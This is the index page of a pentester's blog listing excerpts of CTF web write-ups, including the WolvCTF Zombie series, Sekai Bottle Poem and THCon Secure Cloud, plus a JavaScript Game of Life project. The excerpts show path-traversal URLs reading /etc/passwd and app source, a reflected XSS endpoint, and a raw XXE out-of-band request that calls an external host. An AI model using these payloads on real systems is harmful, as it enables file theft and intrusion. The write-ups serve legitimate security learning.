xl00t : CTF - Pentester - Testing things

Here are some of my learnings, CTF writeups and research.

(Also some lazy writeups/scripts: https://gist.github.com/xl00t)

Discord: xl00t#5697

Midnight Flag CTF 2023 Comme Une Chaussette

Comme dans une chaussette - Web. Description: A company that proposes to sanitize inputs for you, does that tempt you? This is the beta version, and I heard that they log everything to train their AI model. Take control of the server to check if all this is true! Additional information: Sources: https://cdn.midnightflag.fr/comme_dans_une_chaussette.zip. You have all the files in the .zip provided to you (the flag file name as well as the webroot change on the remote); there is no point in attacking the challenge directly if you don’t have a working payload locally....

April 17, 2023

WolvCTF 2023 Zombie 301 401

Zombie 301 and 401 - Web. As debug is off and httponly is on, it's gonna be hard. Maybe? IDEA: Zombie's last version is from 2018, maybe we will find some 0-day (1-day ofc if it's the intended way): https://github.com/assaf/zombie/blob/master/CHANGELOG.md. Our version on the challenge is the last one, confirmed in package.json: { "name": "zombie", "version": "1.0.0", "description": "", "main": "index.js", "author": "", "dependencies": { "escape-html": "^1.0.3", "express": "^4.18.2", "zombie": "^6.1.4" } } Start of our research: On the zombie....

March 20, 2023

WolvCTF 2023 Zombie 201

Zombie 201 - Web. Description: Congratulations, you got the admin’s cookie! Can you do it again? It might be a little harder this time. You are well on your way through the gauntlet. You can’t stop now. The task is the same as in the previous part, the “Zombie 101” challenge. All the files are the same, only the configuration is different. From the docker-compose.yml file, on line 9, we can see that the configuration file changed....

March 19, 2023

WolvCTF 2023 Zombie 101

Zombie 101 - Web. Description: Can you survive the Zombie gauntlet!? First in a sequence of four related challenges. Solving one will unlock the next one in the sequence. They all use the same source code but each one has a different configuration file. This first one is a garden variety “steal the admin’s cookie”. Good luck! Reflected XSS on: https://zombie-101-tlejfksioa-ul.a.run.app/zombie?show=xsshere. The vulnerable code: app.get('/zombie', function(req, res) { const show = req....

March 19, 2023

Sekai CTF 2022 Bottle Poem

bottle-poem - web. LFI here: http://bottle-poem.ctf.sekai.team/show?id=../../etc/passwd. While enumerating we can see that this web app is a Python one (confirmed here: http://bottle-poem.ctf.sekai.team/show?id=../../proc/self/cmdline). So we can try to get: http://bottle-poem.ctf.sekai.team/show?id=../app.py, response: No!!!! To bypass this filter I tried: http://bottle-poem.ctf.sekai.team/show?id=.././app.py. Like so we got the source of the app. Requesting http://bottle-poem.ctf.sekai.team/show?id=/app/app.py also works because of: requested_path = os.path.join(os.getcwd() + "/poems", param). If a component is an absolute path, all previous components are thrown away and joining continues from the absolute path component....

September 30, 2022

THCon CTF 2022 Secure Cloud

First step: XXE OOB. Found on: http://challenges1.thcon.party:2000/create_pres.php
POST /create_pres.php HTTP/1.1
Host: challenges1.thcon.party:2000
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------34783305014501417421413273416
Content-Length: 524
Origin: http://challenges1.thcon.party:2000
Connection: close
Referer: http://challenges1.thcon.party:2000/create_pres.php
Cookie: token=8JGY8xbpVP1UXrQgAUf-W; PHPSESSID=quabf7p3f2b9ofsdhbfa4hi3mb
Upgrade-Insecure-Requests: 1

-----------------------------34783305014501417421413273416
Content-Disposition: form-data; name="name"

test
-----------------------------34783305014501417421413273416
Content-Disposition: form-data; name="comment"

--><!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY % sp SYSTEM "http://x....

June 16, 2022

THCon CTF 2021 Modern Webchat

Modern Webchat - Web (250 points / 5 solves). Description: IRC is a relic of the past. Solution: We visit the website and land on a web chat where we can choose a nickname and a color. We can log in and then send messages. From time to time we receive a message from the admin which says: [admin] LePireBot: Message restricted to administrators. Obviously we must fake being admin in order to see the message....

June 12, 2021

Javascript Conway Game of Life

Here you can find a one-day project I made in order to learn JS. The goal was to reproduce the popular Conway’s Game of Life. This is what the game looks like:
Used technologies: HTML / Bootstrap, JS / p5.js
Functionalities:
Holding left click places cells and right click deletes cells
Pause and play the game
Set the frames per second of the game
Forward the game step by step (frame by frame)
Clear the board
Use predefined popular forms
Make random cells on the whole board
Zoom/Unzoom will resize the board to full screen, reset the board and randomize the board
Debugging cell positions, values and neighbour counts
Demo HERE

March 20, 2021